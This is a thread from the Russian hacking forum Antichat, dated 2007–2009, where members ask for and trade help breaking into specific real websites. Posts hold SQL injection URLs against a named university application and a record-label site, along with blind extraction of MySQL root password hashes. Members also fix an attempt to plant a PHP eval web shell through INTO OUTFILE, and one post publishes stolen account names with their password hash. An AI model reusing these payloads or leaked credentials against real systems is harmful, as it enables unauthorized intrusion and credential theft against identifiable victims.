Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Ваши вопросы по уязвимостям. |

04.08.2007, 09:55
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
Ваши вопросы по уязвимостям.
В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму).
Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось Constantine; 04.09.2008 в 19:43..
|
|
|

05.08.2007, 02:34
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме: 4608122
Репутация:
874
|
|
Расскажите про вот такую штуку.
http://webapps.jhu.edu/needs/detail.cfm?id=1805'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES)
Я вначале подумал что это MSSQL (потому и писал в запросе INFORMATION_SCHEMA.TABLES), а потом посмотрел вроде и не мс, а макромедиа. Короче не понятно мне. Плюс к тому странный выдает ответ - не найду такого-то файла, отсюда вывод что можно грузить файлы баз данных если знаешь имя файла. Но там дописывается расширение автоматом, в связи с этим пробовал %00 - не получилось. Вообщем не все мне ясно с этой базой. Может кто видел такое - поделитесь.
|
|
|

05.08.2007, 10:00
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
Это ColdFusion
права у твоей небольшие - нет прав на системные таблицы. это видим из
http://webapps.jhu.edu/needs/detail.cfm?id=1805+union+select+1,2,3,4,5,6,name,8 ,9,10,11,12,13+from+MSysObjects
подбирай кол-во столбцов
http://webapps.jhu.edu/needs/detail.cfm?id=1805+and+1=0+union+select+1,2 ...
Загвоздка в том что запрос не выполнится пока одновременно не будет подобрано точное кол-во + подставлено в одно из полей правильное название одного из столцов (иначе база считает запрос пустым)
либо же при наличие прав у юзера (а они часто оставляются по дефолту) выполнять любые запросы в кф базе
http://webapps.jhu.edu/needs/detail.cfm?id=1805;запрос
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

05.08.2007, 15:20
|
|
Новичок
Регистрация: 30.07.2007
Сообщений: 3
Провел на форуме: 14488
Репутация:
2
|
|
brute/shell
приветствую!
столкнулся с такой проблемой (
http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/*
Error Number: 1242
Error Message: Subquery returns more than 1 row
а в случае
1=if(ascii(substring((select user()),1,1))>=100,1,0)
все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать )
права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает...
------------------------------------------------------------------
и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает.....
http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2
если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt....
Error Number: 1064
Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2
уже и так писал и сяк, не получается с этим серваком (((
версия 5.0.22
с уважением,
|
|
|

05.08.2007, 21:13
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме: 242062
Репутация:
18
|
|
Сообщение от s1mplec0de
http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*
Если я не ошибаюсь, то загрузка файла через sql происходит путем ... union+select+1,2,3,что будем загружать,5,6..+from+существующ ая таблица+into+outfile+ '/полный/путь/до/директории/для/записи/123.php'/*
Т.е. вы посто забыли поставить кавычки за прописать полный путь.
|
|
|

05.08.2007, 16:01
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Error Number: 1242
Error Message: Subquery returns more than 1 row
переведи
юзай лимит
хотя странно, почему при where выдается не одна строка... попробуй тупо лимит 0,1 , как правило, рут - первый юзер.
по поводу второго:
<?php eval($_GET[http://server.com/cmd.php]) ?>
это должно быть в кавычках
Последний раз редактировалось n1†R0x; 05.08.2007 в 16:03..
|
|
|

06.08.2007, 12:43
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме: 2030482
Репутация:
1796
|
|
подскажите как правильно запрос написать с лимитом....
select password from mysql.user where user=char(114,111,111,116) limit 0,1
Вот это ты имел ввиду?
http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/*
Error Number: 1242
Error Message: Subquery returns more than 1 row
Конечно может я не прав но первая мысль у меня возникла что в этой таблице два юзера "root"... Интересно это возможно или нет...
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 06.08.2007 в 12:47..
Причина: Глупость написал (
|
|
|

07.08.2007, 13:43
|
|
Новичок
Регистрация: 30.07.2007
Сообщений: 3
Провел на форуме: 14488
Репутация:
2
|
|
там как не странно но два пользователя с 2-мя одинаковыми пассами....
limit помог, пасс соответственно как я и писал выше....
root:3553f4a3048036eb
touchandgo:3553f4a3048036eb
http://www.touchandgorecords.com/bands/band.php?id=70%20union%20select%201,concat(USER(), char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7, 8/--
------
именно ' там фильтруются, у меня не получилось шелл залить(
благодарю за помощь, отдельное спасибо I-I()/Ib - за статью..... )
|
|
|

17.10.2009, 10:44
|
|
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме: 333485
Репутация:
13
|
|
есть какие нибудь базы по хешам желательный на пхп или exe
|
|
|

17.10.2009, 11:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от tracy
есть какие нибудь базы по хешам желательный на пхп или exe
hashcracking.info
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|